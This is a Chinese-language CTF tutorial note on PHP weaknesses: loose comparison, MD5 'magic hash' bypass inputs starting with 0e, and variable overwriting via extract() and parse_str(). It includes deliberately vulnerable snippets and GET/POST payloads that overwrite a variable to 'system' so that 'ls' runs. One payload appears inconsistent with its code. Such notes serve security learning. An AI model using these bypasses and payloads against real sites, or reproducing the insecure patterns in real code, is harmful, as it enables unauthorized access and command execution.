数字与字符串比较
比较操作符:
**===**:在比较之前,会比较两边的类型是否相同,若相同再进行比较
**==**:在比较时,若两边类型不同,且一边是字符串或含有数字的字符串,另一边是数字,那么会将字符串转换为数字再进行比较
例如:
1 2 3 4
| 1admin==1 //true 1a23==123 //flase admin==0 //true 0e123456==0e56789 //true
|
在进行字符串和数字的弱类型比较时,字符串的一开始部分就决定了它的值,
当数字后出现e或E时,系统会将其视为科学计算法,例如0e123456==0e56789=0
CTF之md5绕过
md5绕过主要使用了科学计数法的原理
1 2 3 4 5 6 7 8 9 10
| $md51 = md5('QNKCDZO');//md5=0e830400451993494058024219903391 $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else { echo "false!!!"; }} else{echo "please input a";}
|
以上要满足$a != ‘QNKCDZO’ && $md51 == $md52
由于md5(‘QNKCDZO’);//md5=0e830400451993494058024219903391
只要找到一个在md5编码后为0e开头的字符串就可以了
下面给出几个例子
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70
| s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611904 s214587387a 0e848240448830537924465865611904 s878926199a 0e545993274517709034328855841020 s1091221200a 0e940624217856561557816327384675 s1885207154a 0e509367213418206700842008763514 s1502113478a 0e861580163291561247404381396064 s1885207154a 0e509367213418206700842008763514 s1836677006a 0e481036490867661113260034900752 s155964671a 0e342768416822451524974117254469 s1184209335a 0e072485820392773389523109082030 s1665632922a 0e731198061491163073197128363787 s1502113478a 0e861580163291561247404381396064 s1836677006a 0e481036490867661113260034900752 s1091221200a 0e940624217856561557816327384675 s155964671a 0e342768416822451524974117254469 s1502113478a 0e861580163291561247404381396064 s155964671a 0e342768416822451524974117254469 s1665632922a 0e731198061491163073197128363787 s155964671a 0e342768416822451524974117254469 s1091221200a 0e940624217856561557816327384675 s1836677006a 0e481036490867661113260034900752 s1885207154a 0e509367213418206700842008763514 s532378020a 0e220463095855511507588041205815 s878926199a 0e545993274517709034328855841020 s1091221200a 0e940624217856561557816327384675 s214587387a 0e848240448830537924465865611904 s1502113478a 0e861580163291561247404381396064 s1091221200a 0e940624217856561557816327384675 s1665632922a 0e731198061491163073197128363787 s1885207154a 0e509367213418206700842008763514 s1836677006a 0e481036490867661113260034900752 s1665632922a 0e731198061491163073197128363787 s878926199a 0e545993274517709034328855841020
|
注意:
bool类型的true跟任意类型的字符串都相等
变量覆盖问题:
变量覆盖:在一个变量已被赋值的基础上,再次对该变量赋值,覆盖掉了原来的值
变量覆盖问题:对一些函数的使用不当导致信息泄露
经常发生在以下两个函数里:
extract()
parse_str()
定义和用法
extract() 函数从数组中将变量导入到当前的符号表。
该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。
该函数返回成功设置的变量数目。
例如:
1 2 3 4 5
| <?php $arr=$_GET['arr']; extract($arr); @$d($_POST['a']); ?>
|
GET : ?arr[d]=system
POST : a=ls
在这里对变量d进行了覆盖,进而得以访问文件目录,达到攻击
parse_str()
定义与使用:
该函数与extract()函数类似,只是括号内的格式不一样
parse_str(“name=Peter&age=43”);
将等号前的字符串作为变量名,等号后的字符串作为变量值
例如:
1 2 3 4 5
| <?php $arr=$_GET['arr']; parse_str($arr); @$d($_POST['a']); ?>
|
payload:
GET : ?id=arr=d=system
POST : a=ls